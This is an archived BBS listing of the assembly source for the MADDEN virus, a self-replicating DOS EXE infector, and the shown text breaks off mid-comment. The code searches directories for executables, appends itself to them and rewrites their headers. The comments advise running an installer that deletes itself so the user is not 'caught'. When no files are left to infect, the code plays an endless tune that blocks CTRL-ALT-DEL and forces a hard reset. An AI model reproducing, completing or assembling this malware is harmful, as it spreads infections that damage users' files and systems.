home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / madden.asm < prev    next >
Assembly Source File  |  1992-07-17  |  34KB  |  806 lines

  1. ;The MADDEN virus is an EXE file infector which can jump from directory to
  2. ;directory.   It attaches itself to the end of a file and
  3. ;modifies the EXE file header so that it gets control first, before the host
  4. ;program. When it is done doing its job, it passes control to the host program,
  5. ;so that the host executes without a hint that the virus is there.
  6.  
  7.  
  8.     .SEQ                       ;segments must appear in sequential order
  9.                    ;to simulate conditions in actual active virus
  10.  
  11.  
  12. ;MGROUP  GROUP   HOSTSEG,HSTACK     ;Host stack and code segments grouped together
  13.  
  14. ;HOSTSEG program code segment. The virus gains control before this routine and
  15. ;attaches itself to another EXE file. As such, the host program for this
  16. ;installer simply tries to delete itself off of disk and terminates. That is
  17. ;worthwhile if you want to infect a system with the virus without getting
  18. ;caught. Just execute the program that infects, and it disappears without a
  19. ;trace. You might want to name the program something more innocuous, though.
  20. ;MADDEN also locks the pc into a 'maddening' toon when it runs out
  21. ;of files to infect. (MADDEN can be assembled to an .obj file under a86,
  22. ;then linked to the 'infected' .exe form.)
  23.  
  24. HOSTSEG SEGMENT BYTE
  25.     ASSUME  CS:HOSTSEG,SS:HSTACK
  26.  
  27. PGMSTR  DB 'MADDEN.EXE',0
  28.  
  29. HOST:
  30.     mov     ax,cs           ;we want DS=CS here
  31.     mov     ds,ax
  32.     mov     dx,OFFSET PGMSTR
  33.     mov     ah,41H
  34.     int     21H             ;delete this exe file
  35.     mov     ah,4CH
  36.     mov     al,0
  37.     int     21H             ;terminate normally
  38. HOSTSEG ENDS
  39.  
  40.  
  41. ;Host program stack segment
  42.  
  43. HSTACK  SEGMENT PARA STACK
  44.     db  100H dup (?)        ;100 bytes long
  45. HSTACK  ENDS
  46.  
  47. ;------------------------------------------------------------------------
  48. ;This is the virus itself
  49.  
  50. STACKSIZE       EQU     100H           ;size of stack for the virus
  51. NUMRELS         EQU     2              ;number of relocatables in the virus, which must go in the relocatable pointer table
  52.  
  53. ;VGROUP  GROUP   VSEG,VSTACK    ;Virus code and stack segments grouped together
  54.  
  55. ;MADDEN Virus code segment. This gains control first, before the host. As this
  56. ;ASM file is layed out, this program will look exactly like a simple program
  57. ;that was infected by the virus.
  58.  
  59. VSEG    SEGMENT PARA
  60.     ASSUME  CS:VSEG,DS:VSEG,SS:VSTACK
  61.  
  62. ;data storage area comes before any code
  63. VIRUSID DW      0C8AAH                ;identifies virus
  64. OLDDTA  DD      0                     ;old DTA segment and offset
  65. DTA1    DB      2BH dup (?)           ;new disk transfer area
  66. DTA2    DB      56H dup (?)           ;dta for directory finds (2 deep)
  67. EXE_HDR DB      1CH dup (?)           ;buffer for EXE file header
  68. EXEFILE DB      '\*.EXE',0            ;search string for an exe file
  69. ALLFILE DB      '\*.*',0              ;search string for any file
  70. USEFILE DB      78 dup (?)            ;area to put valid file path
  71. LEVEL   DB      0                     ;depth to search directories for a file
  72. HANDLE  DW      0                     ;file handle
  73. FATTR   DB      0                     ;old file attribute storage area
  74. FTIME   DW      0                     ;old file time stamp storage area
  75. FDATE   DW      0                     ;old file date stamp storage area
  76. FSIZE   DD      0                     ;file size storage area
  77. VIDC    DW      0                     ;storage area to put VIRUSID from new host .EXE in, to check if virus already there
  78. VCODE   DB      1                     ;identifies this version
  79. MUZIK   dw      4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay
  80.     dw      3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy
  81.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  82.     dw      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  83.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  84.     dw      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  85.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  86.     dw      3043,0006, 5119,0006, 5423,0006, 3043,0006, 
  87.     dw      6087,0020, 
  88.  
  89.     dw      6087,0006, 
  90.     dw      7239,0006, 3619,0006, 4831,0006, 6087,0006
  91.     dw      7670,0006, 7239,0006, 4831,0006, 3619,0006
  92.  
  93.     dw      6087,0006, 4063,0006, 3043,0006, 5119,0006
  94.     dw      4831,0006, 6087,0006, 7239,0006, 8126,0006
  95.     dw      6087,0020, 
  96.  
  97.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  98.     dw      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  99.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  100.     dw      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  101.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  102.     dw      3043,0006, 5119,0006, 5423,0006, 3043,0006, 
  103.     dw      6087,0020, 
  104.  
  105.     dw      6087,0006, 
  106.     dw      7239,0006, 3619,0006, 4831,0006, 6087,0006
  107.     dw      7670,0006, 7239,0006, 4831,0006, 3619,0006
  108.  
  109.     dw      6087,0006, 4063,0006, 3043,0006, 5119,0006
  110.     dw      4831,0006, 6087,0006, 7239,0006, 8126,0006
  111.     dw      6087,0020, 
  112.  
  113.     dw      7670,0006, 7239,0006, 4831,0006, 3619,0006
  114.     dw      3043,0006, 3619,0006, 4831,0006, 6087,0006
  115.     dw      3043,0010, 
  116.  
  117.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  118.     dw      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  119.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  120.     dw      3043,0006, 4831,0006, 4063,0006, 3043,0006, 
  121.     dw      4304,0006, 4063,0006, 4304,0006, 4063,0006,
  122.     dw      3043,0006, 5119,0006, 5423,0006, 3043,0006, 
  123.     dw      6087,0020, 
  124.  
  125.     dw      7670,0006, 7239,0006, 4831,0006, 3619,0006
  126.     dw      3043,0006, 3619,0006, 4831,0006, 6087,0006
  127.     dw      3043,0010, 
  128.  
  129.     dw      6087,0006, 
  130.     dw      7239,0006, 3619,0006, 4831,0006, 6087,0006
  131.     dw      7670,0006, 7239,0006, 4831,0006, 3619,0006
  132.  
  133.     dw      6087,0006, 4063,0006, 3043,0006, 5119,0006
  134.     dw      4831,0006, 6087,0006, 7239,0006, 8126,0006
  135.     dw      6087,0020, 
  136.  
  137.     dw      0ffffh
  138. ;--------------------------------------------------------------------------
  139. ;MADDEN virus main routine starts here
  140. VIRUS:
  141.     push    ax              ;save startup info in ax
  142.     mov     ax,cs
  143.     mov     ds,ax           ;set up DS=CS for the virus
  144.     mov     ax,es           ;get PSP Seg
  145.     mov     WORD PTR [OLDDTA+2],ax   ;set up default DTA Seg=PSP Seg in case of abort without getting it
  146.     call    SHOULDRUN       ;run only when certain conditions met signalled by z set
  147.     jnz     REL1            ;conditions aren't met, go execute host program
  148.     call    SETSR           ;modify SHOULDRUN procedure to activate conditions
  149.     call    NEW_DTA         ;set up a new DTA location
  150.     call    FIND_FILE       ;get an exe file to attack
  151.     jnz     TOON            ;returned nz - no valid files left, play maddening toon!
  152.     call    SAVE_ATTRIBUTE  ;save the file attributes and leave file opened in r/w mode
  153.     call    INFECT          ;move program code to file we found to attack
  154.     call    REST_ATTRIBUTE  ;restore the original file attributes and close the file
  155. FINISH: call    RESTORE_DTA     ;restore the DTA to its original value at startup
  156.     pop     ax              ;restore startup value of ax
  157. REL1:                           ;relocatable marker for host stack segment
  158.     mov     bx,HSTACK       ;set up host program stack segment (ax=segment)
  159.     cli                     ;interrupts off while changing stack
  160.     mov     ss,bx
  161. REL1A:                          ;marker for host stack pointer
  162.     mov     sp,OFFSET HSTACK
  163.     mov     es,WORD PTR [OLDDTA+2]  ;set up ES correctly
  164.     mov     ds,WORD PTR [OLDDTA+2]  ;and DS
  165.     sti                     ;interrupts back on
  166. REL2:                           ;relocatable marker for host code segment
  167.     jmp     FAR PTR HOST    ;begin execution of host program
  168.  
  169. ;--------------------------------------------------------------------------
  170. ;First Level - Find a file which passes FILE_OK
  171. ;
  172. ;This routine does a complex directory search to find an EXE file in the
  173. ;current directory, one of its subdirectories, or the root directory or one
  174. ;of its subdirectories, to find a file for which FILE_OK returns with C reset.
  175. ;If you want to change the depth of the search, make sure to allocate enough
  176. ;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work,
  177. ;since the recursive FINDBR uses a different DTA area for the search (see DOS
  178. ;functions 4EH and 4FH) on each level.
  179. ;
  180. FIND_FILE:
  181.     mov     al,'\'                  ;set up current directory path in USEFILE
  182.     mov     BYTE PTR [USEFILE],al
  183.     mov     si,OFFSET USEFILE+1
  184.     xor     dl,dl
  185.     mov     ah,47H
  186.     int     21H                     ;get current dir, USEFILE= \dir
  187.     cmp     BYTE PTR [USEFILE+1],0  ;see if it is null. If so, its the root
  188.     jnz     FF2                     ;not the root
  189.     xor     al,al                   ;make correction for root directory,
  190.     mov     BYTE PTR [USEFILE],al   ;by setting USEFILE = ''
  191. FF2:    mov     al,2
  192.     mov     [LEVEL],al              ;search 2 subdirs deep
  193.     call    FINDBR                  ;attempt to locate a valid file
  194.     jz      FF3                     ;found one - exit
  195.     xor     al,al                   ;nope - try the root directory
  196.     mov     BYTE PTR [USEFILE],al   ;by setting USEFILE= ''
  197.     inc     al                      ;al=1
  198.     mov     [LEVEL],al              ;search one subdir deep
  199.     call    FINDBR                  ;attempt to find file
  200. FF3:
  201.     ret                             ;exit with z flag set by FINDBR to indicate success/failure
  202.  
  203. ;***************************************************************************
  204. ; This routine enables MADDEN virus to compell the pc to play a 
  205. ;'maddening' toon when it can't find a file to infect
  206. ;**************************************************************************
  207. TOON:
  208.     cli                          ;interrupts off
  209.     mov     al,10110110xb        ;the magic number
  210.     out     43h,al               ;send it
  211.     lea     si,MUZIK              ;point (si) to our note table
  212. TOON2:  cld                          ;must increment forward
  213.     lodsw                        ;load word into ax and increment (si)
  214.     cmp     ax,0ffffh            ;is it ffff - if so end of table
  215.     jz      GO_MUZIK2             ;so, time to jump into endless loop
  216.     out     42h,al               ;send LSB first
  217.     mov     al,ah                ;place MSB in al
  218.     out     42h,al               ;send it next
  219.     in      al,61h               ;get value to turn on speaker
  220.     or      al,00000011xb        ;OR the gotten value
  221.     out     61h,al               ;now we turn on speaker
  222.     lodsw                        ;load the repeat loop count into (ax)
  223. LOOP6:  mov     cx,8000              ;delay count
  224. LOOP7:  loop    LOOP7                ;do the delay
  225.     dec     ax                   ;decrement repeat count
  226.     jnz     loop6                ;if not = 0 loop back
  227.     in      al,61h               ;all done
  228.     and     al,11111100xb        ;number turns speaker off
  229.     out     61h,al               ;send it
  230.     jmp     short TOON2          ;now go do next note
  231. GO_MUZIK2:                            ;our loop point
  232.     sti                          ;enable interrupts
  233.     jmp    TOON                  ;jump back to beginning - this code
  234.                      ; has the additional advantage of
  235.                      ;locking out CTRL-ALT-DEL reboot.
  236.                      ;The user must do a hard reset to recover.
  237. ;--------------------------------------------------------------------------
  238. ;SEARCH FUNCTION
  239. ;---------------------------------------------------------------------------
  240. ;Second Level - Find in a branch
  241. ;
  242. ;This function searches the directory specified in USEFILE for EXE files.
  243. ;after searching the specified directory, it searches subdirectories to the
  244. ;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this
  245. ;routine exits with Z set and leaves the file and path in USEFILE
  246. ;
  247. FINDBR:
  248.     call    FINDEXE         ;search current dir for EXE first
  249.     jnc     FBE3            ;found it - exit
  250.     cmp     [LEVEL],0       ;no - do we want to go another directory deeper?
  251.     jz      FBE1            ;no - exit
  252.     dec     [LEVEL]         ;yes - decrement LEVEL and continue
  253.     mov     di,OFFSET USEFILE       ;'\curr_dir' is here
  254.     mov     si,OFFSET ALLFILE       ;'\*.*' is here
  255.     call    CONCAT          ;get '\curr_dir\*.*' in USEFILE
  256.     inc     di
  257.     push    di              ;store pointer to first *
  258.     call    FIRSTDIR        ;get first subdirectory
  259.     jnz     FBE             ;couldn't find it, so quit
  260. FB1:                            ;otherwise, check it out
  261.     pop     di              ;strip \*.* off of USEFILE
  262.     xor     al,al
  263.     stosb
  264.     mov     di,OFFSET USEFILE
  265.     mov     bx,OFFSET DTA2+1EH
  266.     mov     al,[LEVEL]
  267.     mov     dl,2BH          ;compute correct DTA location for subdir name
  268.     mul     dl              ;which depends on the depth we're at in the search
  269.     add     bx,ax           ;bx points to directory name
  270.     mov     si,bx
  271.     call    CONCAT          ;'\curr_dir\sub_dir' put in USEFILE
  272.     push    di              ;save position of first letter in sub_dir name
  273.     call    FINDBR          ;scan the subdirectory and its subdirectories (recursive)
  274.     jz      FBE2            ;if successful, exit
  275.     call    NEXTDIR         ;get next subdirectory in this directory
  276.     jz      FB1             ;go check it if search successful
  277. FBE:                            ;else exit, NZ set, cleaned up
  278.     inc     [LEVEL]         ;increment the level counter before exit
  279.     pop     di              ;strip any path or file spec off of original
  280.     xor     al,al           ;directory path
  281.     stosb
  282. FBE1:   mov     al,1            ;return with NZ set
  283.     or      al,al
  284.     ret
  285.  
  286. FBE2:   pop     di              ;successful exit, pull this off the stack
  287. FBE3:   xor     al,al           ;and set Z
  288.     ret                     ;exit
  289.  
  290. ;--------------------------------------------------------------------------
  291. ;Third Level - Part A - Find an EXE file
  292. ;
  293. ;This function searches the path in USEFILE for an EXE file which passes
  294. ;the test FILE_OK. This routine will return the full path of the EXE file
  295. ;in USEFILE, and the c flag reset, if it is successful. Otherwise, it will return
  296. ;with the c flag set. It will search a whole directory before giving up.
  297. ;
  298. FINDEXE:
  299.     mov     dx,OFFSET DTA1  ;set new DTA for EXE search
  300.     mov     ah,1AH
  301.     int     21H
  302.     mov     di,OFFSET USEFILE
  303.     mov     si,OFFSET EXEFILE
  304.     call    CONCAT          ;set up USEFILE with '\dir\*.EXE'
  305.     push    di              ;save position of '\' before '*.EXE'
  306.     mov     dx,OFFSET USEFILE
  307.     mov     cx,3FH          ;search first for any file
  308.     mov     ah,4EH
  309.     int     21H
  310. NEXTEXE:
  311.     or      al,al           ;is DOS return OK?
  312.     jnz     FEC             ;no - quit with C set
  313.     pop     di
  314.     inc     di
  315.     stosb                   ;truncate '\dir\*.EXE' to '\dir\'
  316.     mov     di,OFFSET USEFILE
  317.     mov     si,OFFSET DTA1+1EH
  318.     call    CONCAT          ;setup file name '\dir\filename.exe'
  319.     dec     di
  320.     push    di
  321.     call    FILE_OK         ;yes - is this a good file to use?
  322.     jnc     FENC            ;yes - valid file found - exit with c reset
  323.     mov     ah,4FH
  324.     int     21H             ;do find next
  325.     jmp     SHORT NEXTEXE   ;and go test it for validity
  326.  
  327. FEC:                            ;no valid file found, return with C set
  328.     pop     di
  329.     mov     BYTE PTR [di],0 ;truncate \dir\filename.exe to \dir
  330.     stc
  331.     ret
  332. FENC:                           ;valid file found, return with NC
  333.     pop     di
  334.     ret
  335.  
  336.  
  337. ;--------------------------------------------------------------------------
  338. ;Third Level - Part B - Find a subdirectory
  339. ;
  340. ;This function searches the file path in USEFILE for subdirectories, excluding
  341. ;the subdirectory header entries. If one is found, it returns with Z set, and
  342. ;if not, it returns with NZ set.
  343. ;There are two entry points here, FIRSTDIR, which does the search first, and
  344. ;NEXTDIR, which does the search next.
  345. ;
  346. FIRSTDIR:
  347.     call    GET_DTA         ;get proper DTA address in dx (calculated from LEVEL)
  348.     push    dx              ;save it
  349.     mov     ah,1AH          ;set DTA
  350.     int     21H
  351.     mov     dx,OFFSET USEFILE
  352.     mov     cx,10H          ;search for a directory
  353.     mov     ah,4EH          ;do search first function
  354.     int     21H
  355. NEXTD1:
  356.     pop     bx              ;get pointer to search table (DTA)
  357.     or      al,al           ;successful search?
  358.     jnz     NEXTD3          ;no, quit with NZ set
  359.     test    BYTE PTR [bx+15H],10H    ;is this a directory?
  360.     jz      NEXTDIR         ;no, find another
  361.     cmp     BYTE PTR [bx+1EH],'.'    ;is it a subdirectory header?
  362.     jne     NEXTD2          ;no - valid directory, exit, setting Z flag
  363.                 ;else it was dir header entry, so fall through to next
  364. NEXTDIR:                        ;second entry point for search next
  365.     call    GET_DTA         ;get proper DTA address again - may not be set up
  366.     push    dx
  367.     mov     ah,1AH          ;set DTA
  368.     int     21H
  369.     mov     ah,4FH
  370.     int     21H             ;do find next
  371.     jmp     SHORT NEXTD1    ;and loop to check the validity of the return
  372.  
  373. NEXTD2:
  374.     xor     al,al           ;successful exit, set Z flag
  375. NEXTD3:
  376.     ret                     ;exit routine
  377.  
  378. ;--------------------------------------------------------------------------
  379. ;Return the DTA address associated to LEVEL in dx. This is simply given by
  380. ;OFFSET DTA2 + (LEVEL*2BH). Each level must have a different search record
  381. ;in its own DTA, since a search at a lower level occurs in the middle of the
  382. ;higher level search, and we don't want the higher level being ruined by
  383. ;corrupted data.
  384. ;
  385. GET_DTA:
  386.     mov     dx,OFFSET DTA2
  387.     mov     al,2BH
  388.     mul     [LEVEL]
  389.     add     dx,ax                   ;return with dx= proper dta offset
  390.     ret
  391.  
  392. ;--------------------------------------------------------------------------
  393. ;Concatenate two strings: Add the asciiz string at DS:SI to the asciiz
  394. ;string at ES:DI. Return ES:DI pointing to the end of the first string in the
  395. ;destination (or the first character of the second string, after moved).
  396. ;
  397. CONCAT:
  398.     mov     al,byte ptr es:[di]     ;find the end of string 1
  399.     inc     di
  400.     or      al,al
  401.     jnz     CONCAT
  402.     dec     di                      ;di points to the null at the end
  403.     push    di                      ;save it to return to the caller
  404. CONCAT2:
  405.     cld
  406.     lodsb                           ;move second string to end of first
  407.     stosb
  408.     or      al,al
  409.     jnz     CONCAT2
  410.     pop     di                      ;and restore di to point to end of string 1
  411.     ret
  412.  
  413.  
  414. ;--------------------------------------------------------------------------
  415. ;Function to determine whether the EXE file specified in USEFILE is useable.
  416. ;if so return nc, else return c
  417. ;What makes an EXE file useable?:
  418. ;              a) The signature field in the EXE header must be 'MZ'. (These
  419. ;                 are the first two bytes in the file.)
  420. ;              b) The Overlay Number field in the EXE header must be zero.
  421. ;              c) There must be room in the relocatable table for NUMRELS
  422. ;                 more relocatables without enlarging it.
  423. ;              d) The word VIRUSID must not appear in the 2 bytes just before
  424. ;                 the initial CS:0000 of the test file. If it does, the virus
  425. ;                 is probably already in that file, so we skip it.
  426. ;
  427. FILE_OK:
  428.     call    GET_EXE_HEADER         ;read the EXE header in USEFILE into EXE_HDR
  429.     jc      OK_END                 ;error in reading the file, so quit
  430.     call    CHECK_SIG_OVERLAY      ;is the overlay number zero?
  431.     jc      OK_END                 ;no - exit with c set
  432.     call    REL_ROOM               ;is there room in the relocatable table?
  433.     jc      OK_END                 ;no - exit
  434.     call    IS_ID_THERE            ;is id at CS:0000?
  435. OK_END: ret                            ;return with c flag set properly
  436.  
  437. ;--------------------------------------------------------------------------
  438. ;Returns c if signature in the EXE header is anything but 'MZ' or the overlay
  439. ;number is anything but zero.
  440. CHECK_SIG_OVERLAY:
  441.     mov     al,'M'                  ;check the signature first
  442.     mov     ah,'Z'
  443.     cmp     ax,WORD PTR [EXE_HDR]
  444.     jz      CSO_1                   ;jump if OK
  445.     stc                             ;else set carry and exit
  446.     ret
  447. CSO_1:  xor     ax,ax
  448.     sub     ax,WORD PTR [EXE_HDR+26];subtract the overlay number from 0
  449.     ret                             ;c is set if it's anything but 0
  450.  
  451. ;--------------------------------------------------------------------------
  452. ;This function reads the 28 byte EXE file header for the file named in USEFILE.
  453. ;It puts the header in EXE_HDR, and returns c set if unsuccessful.
  454. ;
  455. GET_EXE_HEADER:
  456.     mov     dx,OFFSET USEFILE
  457.     mov     ax,3D02H                ;r/w access open file
  458.     int     21H
  459.     jc      RE_RET                  ;error opening - C set - quit without closing
  460.     mov     [HANDLE],ax             ;else save file handle
  461.     mov     bx,ax                   ;handle to bx
  462.     mov     cx,1CH                  ;read 28 byte EXE file header
  463.     mov     dx,OFFSET EXE_HDR       ;into this buffer
  464.     mov     ah,3FH
  465.     int     21H
  466. RE_RET: ret                             ;return with c set properly
  467.  
  468. ;--------------------------------------------------------------------------
  469. ;This function determines if there are at least NUMRELS openings in the
  470. ;current relocatable table in USEFILE. If there are, it returns with
  471. ;carry reset, otherwise it returns with carry set. The computation
  472. ;this routine does is to compare whether
  473. ;    ((Header Size * 4) + Number of Relocatables) * 4 - Start of Rel Table
  474. ;is >= than 4 * NUMRELS. If it is, then there is enough room
  475. ;
  476. REL_ROOM:
  477.     mov     ax,WORD PTR [EXE_HDR+8] ;size of header, paragraphs
  478.     add     ax,ax
  479.     add     ax,ax
  480.     sub     ax,WORD PTR [EXE_HDR+6] ;number of relocatables
  481.     add     ax,ax
  482.     add     ax,ax
  483.     sub     ax,WORD PTR [EXE_HDR+24] ;start of relocatable table
  484.     cmp     ax,4*NUMRELS            ;enough room to put relocatables in?
  485. RR_RET: ret                             ;exit with carry set properly
  486.  
  487.  
  488. ;--------------------------------------------------------------------------
  489. ;This function determines whether the word at the initial CS:0000 in USEFILE
  490. ;is the same as VIRUSID in this program. If it is, it returns c set, otherwise
  491. ;it returns c reset.
  492. ;
  493. IS_ID_THERE:
  494.     mov     ax,WORD PTR [EXE_HDR+22] ;Initial CS
  495.     add     ax,WORD PTR [EXE_HDR+8]  ;Header size
  496.     mov     dx,16
  497.     mul     dx
  498.     mov     cx,dx
  499.     mov     dx,ax                    ;cxdx = position to look for VIRUSID in file
  500.     mov     bx,[HANDLE]
  501.     mov     ax,4200H                 ;set file pointer, relative to beginning
  502.     int     21H
  503.     mov     ah,3FH
  504.     mov     bx,[HANDLE]
  505.     mov     dx,OFFSET VIDC
  506.     mov     cx,2                     ;read 2 bytes into VIDC
  507.     int     21H
  508.     jc      II_RET                   ;couldn't read - bad file - report as though ID is there so we dont do any more to this file
  509.     mov     ax,[VIDC]
  510.     cmp     ax,[VIRUSID]             ;is it the VIRUSID?
  511.     clc
  512.     jnz     II_RET                   ;if not, then virus is not already in this file
  513.     stc                              ;else it is probably there already
  514. II_RET: ret
  515.  
  516.  
  517. ;--------------------------------------------------------------------------
  518. ;This routine makes sure file end is at paragraph boundary, so the virus
  519. ;can be attached with a valid CS. Assumes file pointer is at end of file.
  520. SETBDY:
  521.     mov     al,BYTE PTR [FSIZE]
  522.     and     al,0FH              ;see if we have a paragraph boundary (header is always even # of paragraphs)
  523.     jz      SB_E                ;all set - exit
  524.     mov     cx,10H              ;no - write any old bytes to even it up
  525.     sub     cl,al               ;number of bytes to write in cx
  526.     mov     dx,OFFSET FINAL     ;set buffer up to point to end of the code (just garbage there)
  527.     add     WORD PTR [FSIZE],cx     ;update FSIZE
  528.     adc     WORD PTR [FSIZE+2],0
  529.     mov     bx,[HANDLE]
  530.     mov     ah,40H              ;DOS write function
  531.     int     21H
  532. SB_E:   ret
  533.  
  534. ;--------------------------------------------------------------------------
  535. ;This routine moves the virus (this program) to the end of the EXE file
  536. ;Basically, it just copies everything here to there, and then goes and
  537. ;adjusts the EXE file header and two relocatables in the program, so that
  538. ;it will work in the new environment. It also makes sure the virus starts
  539. ;on a paragraph boundary, and adds how many bytes are necessary to do that.
  540. ;
  541. INFECT:
  542.     mov     cx,WORD PTR [FSIZE+2]
  543.     mov     dx,WORD PTR [FSIZE]
  544.     mov     bx,[HANDLE]
  545.     mov     ax,4200H                ;set file pointer, relative to beginning
  546.     int     21H                     ;go to end of file
  547.     call    SETBDY                  ;lengthen to a paragraph boundary if necessary
  548.     mov     cx,OFFSET FINAL         ;last byte of code
  549.     xor     dx,dx                   ;first byte of code, DS:DX
  550.     mov     bx,[HANDLE]             ;move virus code to end of file being attacked with
  551.     mov     ah,40H                  ;DOS write function
  552.     int     21H
  553.     mov     dx,WORD PTR [FSIZE]     ;find 1st relocatable in code (SS)
  554.     mov     cx,WORD PTR [FSIZE+2]
  555.     mov     bx,OFFSET REL1          ;it is at FSIZE+REL1+1 in the file
  556.     inc     bx
  557.     add     dx,bx
  558.     mov     bx,0
  559.     adc     cx,bx                   ;cx:dx is that number
  560.     mov     bx,[HANDLE]
  561.     mov     ax,4200H                ;set file pointer to 1st relocatable
  562.     int     21H
  563.     mov     dx,OFFSET EXE_HDR+14    ;get correct old SS for new program
  564.     mov     bx,[HANDLE]             ;from the EXE header
  565.     mov     cx,2
  566.     mov     ah,40H                  ;and write it to relocatable REL1+1
  567.     int     21H
  568.     mov     dx,WORD PTR [FSIZE]
  569.     mov     cx,WORD PTR [FSIZE+2]
  570.     mov     bx,OFFSET REL1A         ;put in correct old SP from EXE header
  571.     inc     bx                      ;at FSIZE+REL1A+1
  572.     add     dx,bx
  573.     mov     bx,0
  574.     adc     cx,bx                   ;cx:dx points to FSIZE+REL1A+1
  575.     mov     bx,[HANDLE]
  576.     mov     ax,4200H                ;set file pointer to place to write SP to
  577.     int     21H
  578.     mov     dx,OFFSET EXE_HDR+16    ;get correct old SP for infected program
  579.     mov     bx,[HANDLE]             ;from EXE header
  580.     mov     cx,2
  581.     mov     ah,40H                  ;and write it where it belongs
  582.     int     21H
  583.     mov     dx,WORD PTR [FSIZE]
  584.     mov     cx,WORD PTR [FSIZE+2]
  585.     mov     bx,OFFSET REL2          ;put in correct old CS:IP in program
  586.     add     bx,1                    ;at FSIZE+REL2+1 on disk
  587.     add     dx,bx
  588.     mov     bx,0
  589.     adc     cx,bx                   ;cx:dx points to FSIZE+REL2+1
  590.     mov     bx,[HANDLE]
  591.     mov     ax,4200H                ;set file pointer relavtive to start of file
  592.     int     21H
  593.     mov     dx,OFFSET EXE_HDR+20    ;get correct old CS:IP from EXE header
  594.     mov     bx,[HANDLE]
  595.     mov     cx,4
  596.     mov     ah,40H                  ;and write 4 bytes to FSIZE+REL2+1
  597.     int     21H
  598.                     ;done writing relocatable vectors
  599.                     ;so now adjust the EXE header values
  600.     xor     cx,cx
  601.     xor     dx,dx
  602.     mov     bx,[HANDLE]
  603.     mov     ax,4200H                ;set file pointer to start of file
  604.     int     21H
  605.     mov     ax,WORD PTR [FSIZE]     ;calculate new initial CS (the virus' CS)
  606.     mov     cl,4                    ;given by (FSIZE/16)-HEADER SIZE (in paragraphs)
  607.     shr     ax,cl
  608.     mov     bx,WORD PTR [FSIZE+2]
  609.     and     bl,0FH
  610.     mov     cl,4
  611.     shl     bl,cl
  612.     add     ah,bl
  613.     sub     ax,WORD PTR [EXE_HDR+8] ;(exe header size, in paragraphs)
  614.     mov     WORD PTR [EXE_HDR+22],ax;and save as initial CS
  615.     mov     bx,OFFSET FINAL         ;compute new initial SS
  616.     add     bx,10H                  ;using the formula SSi=(CSi + (OFFSET FINAL+16)/16)
  617.     mov     cl,4
  618.     shr     bx,cl
  619.     add     ax,bx
  620.     mov     WORD PTR [EXE_HDR+14],ax  ;and save it
  621.     mov     ax,OFFSET VIRUS           ;get initial IP
  622.     mov     WORD PTR [EXE_HDR+20],ax  ;and save it
  623.     mov     ax,STACKSIZE              ;get initial SP
  624.     mov     WORD PTR [EXE_HDR+16],ax  ;and save it
  625.     mov     dx,WORD PTR [FSIZE+2]
  626.     mov     ax,WORD PTR [FSIZE]     ;calculate new file size
  627.     mov     bx,OFFSET FINAL
  628.     add     ax,bx
  629.     xor     bx,bx
  630.     adc     dx,bx                   ;put it in ax:dx
  631.     add     ax,200H                 ;and set up the new page count
  632.     adc     dx,bx                   ;page ct= (ax:dx+512)/512
  633.     push    ax
  634.     mov     cl,9
  635.     shr     ax,cl
  636.     mov     cl,7
  637.     shl     dx,cl
  638.     add     ax,dx
  639.     mov     WORD PTR [EXE_HDR+4],ax ;and save it here
  640.     pop     ax
  641.     and     ax,1FFH                 ;now calculate last page size
  642.     mov     WORD PTR [EXE_HDR+2],ax ;and put it here
  643.     mov     ax,NUMRELS              ;adjust relocatables counter
  644.     add     WORD PTR [EXE_HDR+6],ax
  645.     mov     cx,1CH                  ;and save data at start of file
  646.     mov     dx,OFFSET EXE_HDR
  647.     mov     bx,[HANDLE]
  648.     mov     ah,40H                  ;DOS write function
  649.     int     21H
  650.     mov     ax,WORD PTR [EXE_HDR+6] ;get number of relocatables in table
  651.     dec     ax                      ;in order to calculate location of
  652.     dec     ax                      ;where to add relocatables
  653.     mov     bx,4                    ;Location= (No in table-2)*4+Table Offset
  654.     mul     bx
  655.     add     ax,WORD PTR [EXE_HDR+24];table offset
  656.     mov     bx,0
  657.     adc     dx,bx                   ;dx:ax=end of old table in file
  658.     mov     cx,dx
  659.     mov     dx,ax
  660.     mov     bx,[HANDLE]
  661.     mov     ax,4200H                ;set file pointer to table end
  662.     int     21H
  663.     mov     ax,WORD PTR [EXE_HDR+22]  ;and set up 2 pointers: init CS = seg of REL1
  664.     mov     bx,OFFSET REL1
  665.     inc     bx                      ;offset of REL1
  666.     mov     WORD PTR [EXE_HDR],bx   ;use EXE_HDR as a buffer to
  667.     mov     WORD PTR [EXE_HDR+2],ax ;save relocatables in for now
  668.     mov     ax,WORD PTR [EXE_HDR+22]  ;init CS = seg of REL2
  669.     mov     bx,OFFSET REL2
  670.     add     bx,3                    ;offset of REL2
  671.     mov     WORD PTR [EXE_HDR+4],bx ;write it to buffer
  672.     mov     WORD PTR [EXE_HDR+6],ax
  673.     mov     cx,8                    ;and then write 8 bytes of data in file
  674.     mov     dx,OFFSET EXE_HDR
  675.     mov     bx,[HANDLE]
  676.     mov     ah,40H                  ;DOS write function
  677.     int     21H
  678.     ret                             ;that's it, infection is complete!
  679.  
  680. ;--------------------------------------------------------------------------
  681. ;This routine determines whether the reproduction code should be executed.
  682. ;If it returns Z, the reproduction code is executed, otherwise it is not.
  683. ;Currently, it only executes if the system time variable is a multiple of
  684. ;TIMECT. As such, the virus will reproduce only 1 out of every TIMECT+1
  685. ;executions of the program. TIMECT should be 2^n-1
  686. ;Note that the ret at SR1 is replaced by a NOP by SETSR whenever the program
  687. ;is run. This makes SHOULDRUN return Z for sure the first time, so it
